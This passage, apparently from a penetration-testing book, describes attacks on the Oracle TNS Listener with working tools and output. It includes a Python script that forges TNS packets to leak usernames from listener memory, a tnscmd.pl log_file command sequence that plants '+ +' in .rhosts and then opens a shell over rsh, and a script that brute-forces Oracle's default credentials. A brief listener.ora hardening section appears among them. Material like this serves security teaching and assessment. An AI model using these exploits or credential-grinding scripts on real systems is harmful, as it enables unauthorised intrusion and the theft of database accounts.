Here I describe user and database enumeration techniques, password grinding, and remote buffer overflow attacks launchable against the Oracle TNS Listener service.
The Transparent Network Substrate (TNS) protocol is used by Oracle clients to connect to database instances via the TNS Listener service. The service listens on TCP port 1521 by default (although it is sometimes found on ports 1526 or 1541) and acts as a proxy between database instances and the client system. Figure 8-6 shows an example Oracle web application architecture.
The listener service has its own authentication mechanism, which is controlled and administered separately from the Oracle database. In its default configuration no listener password is set, so anyone who can reach the port can issue administrative commands to the listener (stop, reload, change the log file, and so on) without ever authenticating to a database instance.
tnscmd.pl is an excellent tool you can use to interact with the TNS Listener. It's a Perl script that's available at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd.
You can use tnscmd.pl to issue various commands to the TNS Listener service. Example 8-15 shows the default ping command being issued to the listener to solicit a response.
    # perl tnscmd.pl -h 192.168.189.45
    connect
    writing 87 bytes
    [(CONNECT_DATA=(COMMAND=ping))]
    .W.......6.,...............:................4.............(CONNECT_DATA=(COMMAND=ping))
    read
    ..."..=(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER))
    eon
VSNNUM is the Oracle version number expressed in decimal; convert it to hexadecimal and the version can be read off the digits. Here 135294976 is 0x08107000, which reads as 8.1.7.0.0. Figure 8-7 shows the Base Converter application determining the version as 8.1.7.
You can issue a version command to the TNS Listener using tnscmd.pl, as shown in Example 8-16. In this case, I learn that the server is running Oracle 8.1.7 on Solaris.
    # perl tnscmd.pl version -h 192.168.189.45
    connect
    writing 90 bytes
    [(CONNECT_DATA=(COMMAND=version))]
    .Z.......6.,...............:................4.............(CONNECT_DATA=(COMMAND=version))
    read
    .M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)).b........TNSLSNR.for.Solaris:.Version.8.1.7.0.0.-.Production..TNS.for.Solaris:.Version.8.1.7.0.0.-.Production..Unix.Domain.Socket.IPC.NT.Protocol.Adaptor.for.Solaris:.Version.8.1.7.0.0.-.Development..Oracle.Bequeath.NT.Protocol.Adapter.for.Solaris:.Version.8.1.7.0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.Solaris:.Version.8.1.7.0.0.-.Production,,.........@
    eon
The tnscmd.pl documentation written and maintained by James W. Abendschan at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of TNS Listener commands that can be executed remotely using the tool; they are listed in Table 8-4. I only summarize the tool and its use here, and recommend further investigation of tnscmd.pl if you are interested in Oracle security.
| Command | Notes |
|---|---|
| ping | Pings the listener |
| version | Provides output of the listener version and platform information |
| status | Returns the current status and variables used by the listener |
| debug | Dumps debugging information to the listener log |
| reload | Reloads the listener config file |
| services | Dumps service data |
| save_config | Writes the listener config file to a backup location |
| stop | Shuts down the listener |
You can send a status command to the listener that returns a number of useful pieces of information. Example 8-17 shows this command being issued.
    # perl tnscmd.pl status -h 192.168.189.46
    connect
    writing 89 bytes
    [(CONNECT_DATA=(COMMAND=status))]
    .W.......6.,...............:................4.............(CONNECT_DATA=(COMMAND=status))
    writing 89 bytes
    read
    ........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR
    .........6.........`.............j........(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for.Solaris:.Version.8.1.6.0.0.-.Production)(START_DATE=01-SEP-2000.18:35:49)(SIDNUM=1)(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log)(PRMFILE=/u01/app/oracle/product/8.1.6/network/admin/lis
The SECURITY=OFF setting in the response tells me that no listener password is set, so an anonymous remote attacker can issue administrative commands to the listener with relative ease (the attacks that follow all depend on this). The response also reveals the LOGFILE and PRMFILE paths, the start date, and many other variables; the output above has been cut off for brevity.
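As an added example (my code, not from the book or from tnscmd.pl), the following Python parses the parenthesised name/value strings shown in Examples 8-15 to 8-17 and decodes VSNNUM, so that the version, SECURITY and LOGFILE fields can be pulled out of many listeners' replies without reading each by eye. The sample replies are copied from the examples above; tnscmd.pl prints a dot for every non-printable byte, so the spaces inside the VERSION and START_DATE values have been restored and the truncated PRMFILE field is left out. The five-field VSNNUM layout is my assumption; it fits every value in this chapter.

```python
# Added example: parse TNS Listener NV replies and decode VSNNUM.
# Not from the book or from tnscmd.pl.

# Replies copied from Examples 8-15 and 8-17. STATUS_REPLY is a
# constructed sample built from the visible fields only (the PRMFILE
# field is truncated in the original output and is omitted here).
PING_REPLY = "(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER))"
STATUS_REPLY = (
    "(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER)"
    "(SECURITY=OFF)(VERSION=TNSLSNR for Solaris: Version 8.1.6.0.0 - Production)"
    "(START_DATE=01-SEP-2000 18:35:49)(SIDNUM=1)"
    "(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log))"
)


def parse_nv(s: str) -> list:
    """Parse "(KEY=VALUE)(KEY=(SUB=...))" into nested lists of (key, value)
    pairs. Lists rather than dicts, because keys repeat (an ERROR_STACK
    carries several ERROR entries). A quoted value such as ARGS='(...)'
    is kept whole instead of being parsed."""
    pos = 0

    def group() -> list:
        nonlocal pos
        items = []
        while pos < len(s) and s[pos] == "(":
            pos += 1
            eq = s.index("=", pos)
            key = s[pos:eq].strip()
            pos = eq + 1
            if pos < len(s) and s[pos] == "(":
                value = group()                       # nested group
            elif pos < len(s) and s[pos] == "'":
                end = s.index("'", pos + 1) + 1
                value = s[pos:end]                    # quoted literal
                pos = end
            else:
                end = s.index(")", pos)
                value = s[pos:end].strip()            # plain value, may be empty
                pos = end
            if pos >= len(s) or s[pos] != ")":
                raise ValueError("unbalanced NV string at offset %d" % pos)
            pos += 1
            items.append((key, value))
        return items

    return group()


def nv_get(items, *path):
    """Follow a key path (first match at each level); None if absent."""
    cur = items
    for key in path:
        if not isinstance(cur, list):
            return None
        for k, v in cur:
            if k == key:
                cur = v
                break
        else:
            return None
    return cur


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM is the version packed into an integer: 135294976 is
    0x08107000, which the text reads as 8.1.7 in hex. The field widths
    (8-bit major, 4-bit minor, 8-bit release, 4-bit patch, 8-bit port
    release) are an assumption that fits the values in this chapter."""
    return "%d.%d.%d.%d.%d" % (
        (vsnnum >> 24) & 0xFF,
        (vsnnum >> 20) & 0xF,
        (vsnnum >> 12) & 0xFF,
        (vsnnum >> 8) & 0xF,
        vsnnum & 0xFF,
    )


def summarise(reply: str) -> dict:
    """The fields an assessor wants from a ping, version or status reply."""
    tree = parse_nv(reply)
    vsn = nv_get(tree, "DESCRIPTION", "VSNNUM")
    return {
        "version": decode_vsnnum(int(vsn)) if vsn else None,
        "alias": nv_get(tree, "DESCRIPTION", "ALIAS"),
        "security": nv_get(tree, "DESCRIPTION", "SECURITY"),  # "OFF": no password
        "logfile": nv_get(tree, "DESCRIPTION", "LOGFILE"),
        "err": nv_get(tree, "DESCRIPTION", "ERR"),
    }
```

summarise(STATUS_REPLY) returns version 8.1.6.0.0 with security OFF, which is the condition the rest of this section exploits; a listener with a password set reports SECURITY=ON in the same field.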
A further issue, reported publicly by ISS X-Force in October 2000 and independently found by James W. Abendschan, is triggered when the cmdsize field of a TNS Listener command request is falsified, so that the length claimed for the connect data does not match the data actually sent.
In Example 8-18, I send a standard 87-byte ping request to the listener but declare the command size as 256 bytes. The listener responds with over 380 bytes of data, including the hostname, database usernames, and other details of active sessions read from its memory. Repeating the request against a busy server enumerates most of the database usernames over time. The SQL*Net login itself is handled by a child process, so this memory leak doesn't expose passwords.
    # perl tnscmd.pl -h 192.168.189.44 --cmdsize 256
    Faking command length to 256 bytes
    connect
    writing 87 bytes
    [(CONNECT_DATA=(COMMAND=ping))]
    .W.......6.,...............:................4.............(CONNECT_DATA=(COMMAND=ping))
    read
    ........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR_STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=(COMMAND=ping))OL=TCP)(HOST=oraclesvr)(PORT=1541))(CONNECT_DATA=(SERVICE_NAME=pr01)(CID=(PROGRAM=)(HOST=oraclesvr)(USER=oracle))))HOST=TOM)(USER=tom))))\ORANT\BIN\ifrun60.EXE)(HOST=ENGINEERING-1)(USER=Rick))))im6\IM60.EXE)(HOST=RICK)(U'))(ERROR=(CODE=303)(EMFI=1))))
    eon
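To show what --cmdsize actually changes on the wire, here is an added Python example (mine, not from the book or from tnscmd.pl) that builds the TNS connect packet carrying a listener command, optionally with a forged connect-data length, sends it, and harvests hostnames and usernames from a leaked reply. The 58-byte connect header and its constant field values follow the commonly documented TNS connect packet layout and tnscmd.pl's defaults as I understand them; treat those constants as assumptions rather than an Oracle specification. The leak sample is a fragment copied from Example 8-18, and the host and port on the command line are placeholders.

```python
# Added example: TNS connect packet with a forged connect-data length.
# Not from the book or from tnscmd.pl.

import re
import socket
import sys
from typing import Optional

TNS_TYPE_CONNECT = 1
CONNECT_HEADER_LEN = 58  # 8-byte TNS header + 50-byte connect body


def u16(v: int) -> bytes:
    return v.to_bytes(2, "big")


def u32(v: int) -> bytes:
    return v.to_bytes(4, "big")


def build_connect_packet(connect_data: str, fake_len: Optional[int] = None) -> bytes:
    """Wrap a listener command in a TNS connect packet. The packet length in
    the TNS header always tells the truth about the bytes on the wire; only
    the connect-data length field inside the body is forged when fake_len
    is given, which is what tnscmd.pl's --cmdsize does. The constant field
    values are assumptions taken from common client behaviour."""
    data = connect_data.encode("ascii")
    claimed = len(data) if fake_len is None else fake_len
    header = (
        u16(CONNECT_HEADER_LEN + len(data))  # true packet length
        + u16(0)                             # packet checksum (unused)
        + bytes([TNS_TYPE_CONNECT, 0])       # packet type, reserved
        + u16(0)                             # header checksum (unused)
    )
    body = (
        u16(310)                    # TNS version 0x0136
        + u16(300)                  # lowest compatible version
        + u16(0)                    # service options
        + u16(2048)                 # session data unit size
        + u16(32767)                # transport data unit size
        + u16(0x4F98)               # NT protocol characteristics
        + u16(0)                    # line turnaround value
        + u16(1)                    # "value of 1": byte-order marker
        + u16(claimed)              # connect data length: the forgeable field
        + u16(CONNECT_HEADER_LEN)   # offset of connect data from packet start
        + u32(0)                    # maximum receivable data
        + bytes([1, 1])             # connect flags 0 and 1
        + bytes(24)                 # trace cross-facility items, connection id, unused
    )
    return header + body + data


def claimed_connect_data_len(pkt: bytes) -> int:
    """Read back the connect-data length field (offset 24) of a packet."""
    return int.from_bytes(pkt[24:26], "big")


def send_command(host: str, port: int, connect_data: str,
                 fake_len: Optional[int] = None, timeout: float = 5.0) -> bytes:
    """Send one command and return the raw reply, TNS headers and all. A
    listener hit by the cmdsize trick replies with more than the command
    warrants, so keep reading until it stops or the timeout fires."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect_packet(connect_data, fake_len))
        chunks = []
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Fragment copied from Example 8-18: session data leaked by a listener that
# was told the 29-byte ping command was 256 bytes long.
LEAK_SAMPLE = (
    rb"(HOST=oraclesvr)(PORT=1541))(CONNECT_DATA=(SERVICE_NAME=pr01)"
    rb"(CID=(PROGRAM=)(HOST=oraclesvr)(USER=oracle))))HOST=TOM)(USER=tom))))"
    rb"\ORANT\BIN\ifrun60.EXE)(HOST=ENGINEERING-1)(USER=Rick))))im6\IM60.EXE)"
    rb"(HOST=RICK)(U'))(ERROR=(CODE=303)(EMFI=1))))"
)


def leaked_identities(raw: bytes) -> dict:
    """Harvest complete (HOST=...) and (USER=...) values from a leaked reply,
    in order of first appearance. Run over many replies from a busy
    listener this builds the username list the text describes."""
    found = {"hosts": [], "users": []}
    for key, bucket in (("HOST", "hosts"), ("USER", "users")):
        for m in re.findall(rb"\(" + key.encode() + rb"=([^)]*)\)", raw):
            name = m.decode("ascii", "replace")
            if name and name not in found[bucket]:
                found[bucket].append(name)
    return found


if __name__ == "__main__":
    # usage: python tns_cmdsize.py <host> [port]   (host and port are placeholders)
    target = sys.argv[1]
    tcp_port = int(sys.argv[2]) if len(sys.argv) > 2 else 1521
    reply = send_command(target, tcp_port, "(CONNECT_DATA=(COMMAND=ping))", fake_len=256)
    print(len(reply), "bytes received:", leaked_identities(reply))
```

A ping packet comes out at 87 bytes and a version packet at 90, matching the "writing N bytes" lines in Examples 8-15 and 8-16; with fake_len=256 the packet is still 87 bytes, only the field at offset 24 changes. Fragments such as the bare HOST=TOM) in the sample, whose opening parenthesis was overwritten in the leak, are deliberately not matched, so treat the harvested list as a lower bound.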
Table 8-5 lists serious remote vulnerabilities that can be exploited against TNS Listeners in their default configuration (i.e., with no listener password set).
| CVE name | Date (DD/MM/YYYY) | Notes |
|---|---|---|
| CVE-2002-0965 | 12/06/2002 | Oracle 9i (Version 9.0.1) TNS Listener SERVICE_NAME stack overflow |
| CVE-2002-0857 | 14/08/2002 | Oracle 8i and 9i (Versions 8.1.7 and 9.2.x) listener control utility (LSNRCTL) format string bug |
| CVE-2002-0567 | 06/02/2002 | Oracle 8i and 9i (Versions 8.1.7 and 9.0.1 and prior) TNS Listener ExtProc command execution vulnerability |
| CVE-2001-0499 | 27/06/2001 | Oracle 8i (Version 8.1.7 and prior) TNS Listener COMMAND stack overflow |
| CVE-2000-0818 | 25/10/2000 | Oracle 8i (Version 8.1.6 and prior) TNS Listener LOG_FILE command arbitrary file creation bug |
The Xfocus security team (http://www.xfocus.net) released an exploit for the pre-authentication COMMAND stack overflow in the Oracle TNS Listener (CVE-2001-0499), available at http://www.securityfocus.com/data/vulnerabilities/exploits/oracletns-exp.c.
Unfortunately, the exploit was written with offsets and memory addresses for Chinese Windows 2000 SP2 and Oracle 8.1.7, so it needs a degree of research (new return addresses and offsets for the target build) before it can be used effectively against English systems or other operating platforms and Oracle versions.
Oracle 8.1.6 and prior are vulnerable to a remote file creation attack that can lead to system compromise (depending on the amount of network access you have to the target server). By issuing a crafted log_file command, an attacker can point the listener log at a file of his choosing, such as a .rhosts file in the oracle user's home directory. The status response from 192.168.189.46 in Example 8-17 shows the Oracle installation under /u01/app/oracle/, which helps in locating the home directory (here /u01/home/oracle). The attacker then sends a command containing ASCII newline characters, so that the listener's error entry leaves + + on a line of its own in the .rhosts file; rsh reads that line as trusting every user from every host. Example 8-19 shows this attack in progress.
    # perl tnscmd.pl --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=/u01/home/oracle/.rhosts)))" -h 192.168.189.46
    # perl tnscmd.pl --rawcmd " + + " -h 192.168.189.46
    # rsh -l oracle 192.168.189.46 csh -i
    Warning: no access to tty; thus no job control in this shell...
    oraclesvr%
If you look at the .rhosts file, it will look something like:
    oraclesvr% cat /u01/home/oracle/.rhosts
    21-MAR-2002 11:34:22 * log_file * 0
    21-MAR-2002 11:34:23 * log_file * 0
    21-MAR-2002 11:34:23 * 1153
    TNS-01153: Failed to process string:
    + +
    NL-00303: syntax error in NV string
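The defence against the log_file attack, the cmdsize leak and the stop/reload commands in Table 8-4 lives on the listener side. As an added configuration example (not from the book), this listener.ora fragment shows a minimal unprotected listener, which reports SECURITY=OFF in its status output, next to the settings that close these holes. The parameter names are Oracle's own; the host name and the password hash are placeholders.

```text
# Unprotected: a minimal listener.ora with no password set. status reports
# SECURITY=OFF and any client can issue log_file, save_config, stop, ...
LISTENER =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = oraclesvr)(PORT = 1521))
  )

# Hardened additions for the same listener.
# Set the password with "lsnrctl change_password" followed by "save_config"
# so the hashed form is written here; typing a cleartext password into this
# file leaves it readable by every local user who can read listener.ora.
PASSWORDS_LISTENER = <hash written by save_config>
# Refuse runtime SET commands (log_file, trc_file and friends) whether they
# arrive from lsnrctl or from tnscmd.pl; parameters can then only be changed
# by editing this file and reloading.
ADMIN_RESTRICTIONS_LISTENER = ON
LOGGING_LISTENER = ON
```

After reloading, the status command in Example 8-17 should report SECURITY=ON, and the log_file request in Example 8-19 is refused even by a client that knows no password is required for status and version.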
If you can communicate freely with the TNS Listener, you can attempt to connect to and authenticate with backend database instances. Oracle client utilities such as sqlplus, or open source equivalents such as Yet Another SQL*Plus Replacement (YASQL, available from http://sourceforge.net/projects/yasql/), can easily be fed SQL username and password combinations from a shell script or similar process. Some products, such as ISS Database Scanner (http://www.iss.net), can do this effectively on the commercial side. Table 8-6 contains a list of default, preinstalled Oracle database users and their passwords.
| Username | Password |
|---|---|
| ADAMS | WOOD |
| BLAKE | PAPER |
| CLARK | CLOTH |
| CTXSYS | CTXSYS |
| DBSNMP | DBSNMP |
| DEMO | DEMO |
| JONES | STEEL |
| MDSYS | MDSYS |
| MTSSYS | MTSSYS |
| ORDPLUGINS | ORDPLUGINS |
| ORDSYS | ORDSYS |
| OUTLN | OUTLN |
| SCOTT | TIGER |
| SYS | CHANGE_ON_INSTALL |
| SYSTEM | MANAGER |
Phenoelit's excellent Default Password List (DPL) contains a number of other common Oracle passwords, accessible at http://www.phenoelit.de/dpl/dpl.html.
If you are going to brute-force Oracle user passwords and compromise database instances, you need a decent understanding of the SQL*Plus client to navigate the database and do anything productive.
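As an added example (my code, not from the book, OAT or ISS Database Scanner), the following Python feeds the Table 8-6 credentials through sqlplus and classifies each result by Oracle's own error codes, which matters more than it looks: ORA-28009 and ORA-28001 both mean the password was right, and ORA-28000 means the account has hit its FAILED_LOGIN_ATTEMPTS limit and further attempts only deepen the lockout. The host, port and service name on the command line are placeholders; the sqlplus invocation assumes the client is on PATH and that the target accepts EZCONNECT (host:port/service), so for 8i substitute a TNS alias.

```python
# Added example: grind the Table 8-6 default credentials through sqlplus.
# Not from the book, OAT or ISS Database Scanner.

import subprocess
from typing import Callable, List, Tuple

DEFAULT_CREDS: List[Tuple[str, str]] = [
    ("ADAMS", "WOOD"), ("BLAKE", "PAPER"), ("CLARK", "CLOTH"),
    ("CTXSYS", "CTXSYS"), ("DBSNMP", "DBSNMP"), ("DEMO", "DEMO"),
    ("JONES", "STEEL"), ("MDSYS", "MDSYS"), ("MTSSYS", "MTSSYS"),
    ("ORDPLUGINS", "ORDPLUGINS"), ("ORDSYS", "ORDSYS"), ("OUTLN", "OUTLN"),
    ("SCOTT", "TIGER"), ("SYS", "CHANGE_ON_INSTALL"), ("SYSTEM", "MANAGER"),
]

# The probe builds its marker from two literals so that an echoed statement
# can never be mistaken for a successful query result.
PROBE_SQL = "SELECT 'LOGIN-' || 'OK' FROM dual;\nEXIT;\n"
MARKER = "LOGIN-OK"


def classify(output: str) -> str:
    """Map sqlplus output to an outcome using Oracle's own error codes."""
    if MARKER in output:
        return "valid"
    if "ORA-28009" in output:   # SYS must connect AS SYSDBA: password was right
        return "valid-needs-sysdba"
    if "ORA-28001" in output:   # password expired: credentials were right
        return "valid-expired"
    if "ORA-28000" in output:   # account locked: stop hammering this user
        return "locked"
    if "ORA-01017" in output:   # invalid username/password
        return "bad-password"
    if "ORA-12505" in output or "ORA-12514" in output:
        return "unknown-service"  # listener does not know this SID/service
    if "ORA-12541" in output or "ORA-12170" in output:
        return "no-listener"      # nothing listening, or the connect timed out
    return "unknown"


def sqlplus_attempt(host: str, port: int, service: str) -> Callable[[str, str], str]:
    """Return an attempt function bound to one target (placeholder values).
    -L logs on once instead of re-prompting, -S suppresses the banner."""
    def attempt(user: str, password: str) -> str:
        conn = f"{user}/{password}@//{host}:{port}/{service}"
        proc = subprocess.run(["sqlplus", "-L", "-S", conn], input=PROBE_SQL,
                              capture_output=True, text=True, timeout=30)
        return proc.stdout + proc.stderr
    return attempt


def grind(creds, attempt: Callable[[str, str], str]) -> List[Tuple[str, str, str]]:
    """Try each (user, password) pair and record the outcome. A locked
    account is skipped for the rest of the run, and the run stops as soon
    as the service or listener turns out to be unreachable."""
    results = []
    skip = set()
    for user, password in creds:
        if user in skip:
            continue
        outcome = classify(attempt(user, password))
        results.append((user, password, outcome))
        if outcome == "locked":
            skip.add(user)
        elif outcome in ("unknown-service", "no-listener"):
            break
    return results


if __name__ == "__main__":
    import sys
    # usage: python oragrind.py <host> <port> <service>   (all placeholders)
    target, tcp_port, svc = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    for user, password, outcome in grind(DEFAULT_CREDS, sqlplus_attempt(target, tcp_port, svc)):
        print(f"{outcome:20s} {user}/{password}")
```

Swap in your own wordlist for DEFAULT_CREDS (Phenoelit's DPL is the obvious source); the attempt function is injectable so the same grind() loop can drive another client, or a fake target when you want to test the classification offline.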
If you are new to this and want to turn default Oracle passwords into access to the underlying system, the Oracle Auditing Tools (OAT) package for Win32 platforms is available at http://www.cqure.net/tools.jsp?id=7.
In particular, the OAT toolkit contains simple scripts you can use to execute commands, upload and download files via TFTP, and dump the SAM database of Windows-based Oracle servers.
As mentioned earlier in this chapter, MetaCoretex (http://www.metacoretex.com) is a Java database vulnerability scanner with a number of pre- and post-authentication Oracle probes. Useful remote tests include:
TCP bounce port scanning through the Oracle database using UTL_TCP
Oracle SID enumeration
TNS security settings and status